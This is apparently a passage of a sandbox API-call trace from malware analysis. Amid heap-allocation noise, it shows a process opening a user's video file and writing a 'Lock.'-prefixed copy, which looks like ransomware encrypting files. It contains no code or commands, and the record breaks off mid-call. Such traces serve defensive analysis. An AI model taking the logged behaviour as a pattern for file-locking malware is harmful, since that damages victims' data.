[0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0257.920] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.920] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.921] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.921] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/afvn6kbS8JsNZy6W_IRM.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\afvn6kbs8jsnzy6w_irm.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0257.921] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0257.921] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0257.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0257.922] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.922] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.922] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0257.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0257.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/Lock.afvn6kbS8JsNZy6W_IRM.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lock.afvn6kbs8jsnzy6w_irm.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0257.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0257.923] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.923] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.923] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0257.923] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0257.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.923] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0257.924] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xc87b, lpOverlapped=0x0) returned 1 [0257.925] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0257.927] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc87b) returned 0x24b7a48 [0257.927] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0257.927] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0257.927] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0257.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0257.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dc8 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc87b) returned 0x24b7a48 [0257.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0257.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0257.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0257.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0257.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0257.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0257.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc87b) returned 0x24d0b58 [0257.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0257.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0257.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0257.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0257.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0257.933] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0257.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.934] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0257.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0257.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0257.934] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0257.934] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0257.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0257.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0257.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0257.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0257.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0257.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0257.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.935] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0257.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0257.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.936] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0257.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0257.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0257.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0257.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.937] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0257.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0257.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0257.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0257.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 